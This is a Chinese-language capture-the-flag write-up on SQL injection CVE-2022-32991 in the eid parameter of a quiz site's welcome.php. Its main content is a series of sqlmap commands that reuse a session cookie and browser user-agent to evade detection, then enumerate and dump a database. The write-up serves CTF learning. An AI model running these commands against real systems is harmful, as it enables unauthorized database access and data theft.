目录
一些资料
NVD - CVE-2022-32991 (nist.gov)
在welcome.php页面存在sql注入,注入点参数为eid
工具
- sqlmap
- Burpsuite
题解
打开靶场,有登录和注册选项
注册一个账号并登录
观察该url知道,是我们要找的welcome.php界面,但是参数不是我们想找的eid,继续寻找
在点击第一个start之后
找到了我们要的welcome.php和eid
burp抓包看看
sqlmap
参考:sqlmap使用教程(超详细)_Redmaple925的博客-CSDN博客_sqlmap使用教程 详细介绍了sqlmap用法
解1: 只用cookie和ua头
因为要绕过用户登录检测和对sqlmap攻击的检测,通过cookie和ua头来绕过
记录Sqlmap攻击所需的HTTP头部请求参数:
cookie:PHPSESSID=1iudqcpog1tnej5midsic2rjs4
user-agent :Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0
sqlmap命令语句
sqlmap -u "http://eci-2zedkd5o75r8qj5ch710.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=60377db362694&n=1&t=34" -p "eid" --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0" --cookie="PHPSESSID=1iudqcpog1tnej5midsic2rjs4" --batch --dbs
命令解释:
-u => 指定要攻击的url
-p 指定注入点参数
--user-agent 指定ua头
--cookie 指定cookie
--batch 默认确认(y)
--dbs 爆破所有数据库(databases缩写)
爆库:
爆表:
sqlmap -u "http://eci-2zedkd5o75r8qj5ch710.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=60377db362694&n=1&t=34" -p "eid" --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0" --cookie="PHPSESSID=1iudqcpog1tnej5midsic2rjs4" --batch -D ctf --tables
爆字段:
sqlmap -u "http://eci-2zedkd5o75r8qj5ch710.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=60377db362694&n=1&t=34" -p "eid" --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0" --cookie="PHPSESSID=1iudqcpog1tnej5midsic2rjs4" --batch -D ctf -T flag --columns
读数据:
sqlmap -u "http://eci-2zedkd5o75r8qj5ch710.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=60377db362694&n=1&t=34" -p "eid" --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0" --cookie="PHPSESSID=1iudqcpog1tnej5midsic2rjs4" --batch -D ctf -T flag -C flag --dump
解2:保存读取所有http header信息
*号标记注入点
sqlmap:
sqlmap -r /home/kali/桌面/6.txt -batch --dbs
sqlmap -r /home/kali/桌面/6.txt -batch -D ctf --tables
sqlmap -r /home/kali/桌面/6.txt -batch -D ctf -T flag --columns
sqlmap -r /home/kali/桌面/6.txt -batch -D ctf -T flag -C flag --dump
操作和上面一样,不过方便许多
每日emo
温柔扑了个空才长记性。
相信我们的缘分就是从你双击屏幕开始的